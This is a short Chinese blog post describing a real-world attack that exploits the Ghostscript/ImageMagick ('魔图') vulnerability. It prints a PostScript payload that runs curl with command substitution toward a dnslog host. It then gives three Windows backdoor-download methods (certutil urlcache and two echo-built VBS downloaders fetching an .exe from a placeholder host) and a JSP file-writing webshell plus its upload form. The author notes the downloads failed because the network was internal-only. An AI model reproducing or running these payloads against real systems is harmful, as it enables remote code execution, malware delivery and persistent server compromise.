本文深入解析了黑客利用魔图漏洞进行攻击的详细过程,包括利用漏洞下载后门的方法及通过echo命令写入webshell的技术手段。同时,文章还探讨了在纯内网环境下,面对无外网权限时的应对策略。
首先是魔图漏洞
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`)
currentdevice putdeviceprops然后windows下载后门。
方法1:certutil.exe -urlcache -split -f http://xxx/x.exe
方法2:
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs
cscript downfile.vbs http://xxx/x.exe D:\\1.exe方法3:
echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs
echo Post.Open "GET","http://xxx/x.exe",0 >>download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs
echo aGet.Mode = 3 >>download.vbs
echo aGet.Type = 1 >>download.vbs
echo aGet.Open() >>download.vbs
echo aGet.Write(Post.responseBody) >>download.vbs
echo aGet.SaveToFile "D:/a.exe",2 >>download.vbs下载失败
通过echo写入jsp webshell
记得要urlencode编码一次
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%><form method=post action="http://xxx/1.jsp">
<br><br>
<textarea name="t" rows=20 cols=120>你要提交到服务器的代码</textarea>
<br>
要保存成的文件名:<input name="f" size=30 value=shell.jsp>
<input type="submit" value=提交>
</form>结局很经典
纯内网没有外网权限。我傻了。
扫一扫
974
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
